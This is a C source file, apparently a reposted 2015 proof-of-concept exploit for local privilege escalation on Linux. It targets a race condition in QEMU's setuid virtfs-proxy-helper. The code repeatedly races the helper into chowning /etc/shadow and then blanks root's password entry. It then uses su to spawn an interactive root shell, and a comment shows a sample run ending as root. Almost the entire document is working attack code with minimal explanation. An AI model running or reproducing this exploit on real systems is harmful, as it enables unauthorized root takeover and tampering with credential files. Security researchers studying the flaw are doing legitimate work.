Gentoo Local Priv Escalation in QEMU

/* == virtfshell ==  *  * Some distributions make virtfs-proxy-helper from QEMU either SUID or  * give it CAP_CHOWN fs capabilities. This is a terrible idea. While  * virtfs-proxy-helper makes some sort of flimsy check to make sure  * its socket path doesn't already exist, it is vulnerable to TOCTOU.  *  * This should spawn a root shell eventually on vulnerable systems.  *  * - zx2c4  * 2015-12-12  *  *  * zx2c4@thinkpad ~ $ lsb_release -i  * Distributor ID: Gentoo  * zx2c4@thinkpad ~ $ ./virtfshell   * == Virtfshell - by zx2c4 ==  * [+] Trying to win race, attempt 749  * [+] Chown'd /etc/shadow, elevating to root  * [+] Cleaning up  * [+] Spawning root shell  * thinkpad zx2c4 # whoami  * root  *  */   #include <stdio.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/inotify.h> #include <unistd.h> #include <stdlib.h> #include <signal.h>     static int it_worked(void) {     struct stat sbuf = { 0 };     stat("/etc/shadow", &sbuf);     return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); }   int main(int argc, char **argv) {     int fd;     pid_t pid;     char uid[12], gid[12];     size_t attempts = 0;       sprintf(uid, "%d", getuid());     sprintf(gid, "%d", getgid());       printf("== Virtfshell - by zx2c4 ==/n");       printf("[+] Beginning race loop/n");       while (!it_worked()) {         printf("/033[1A/033[2K[+] Trying to win race, attempt %zu/n", ++attempts);         fd = inotify_init();         unlink("/tmp/virtfshell/sock");         mkdir("/tmp/virtfshell", 0777);         inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);         pid = fork();         if (pid == -1)             continue;         if (!pid) {             close(0);             close(1);             close(2);             execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);             _exit(1);         }         read(fd, 0, 0);         unlink("/tmp/virtfshell/sock");         symlink("/etc/shadow", "/tmp/virtfshell/sock");         close(fd);         kill(pid, SIGKILL);         wait(NULL);     }       printf("[+] Chown'd /etc/shadow, elevating to root/n");       system( "cp /etc/shadow /tmp/original_shadow;"         "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"         "cat /tmp/modified_shadow > /etc/shadow;"         "su -c '"         "   echo [+] Cleaning up;"         "   cat /tmp/original_shadow > /etc/shadow;"         "   chown root:root /etc/shadow;"         "   rm /tmp/modified_shadow /tmp/original_shadow;"         "   echo [+] Spawning root shell;"         "   exec /bin/bash -i"         "'");     return 0; }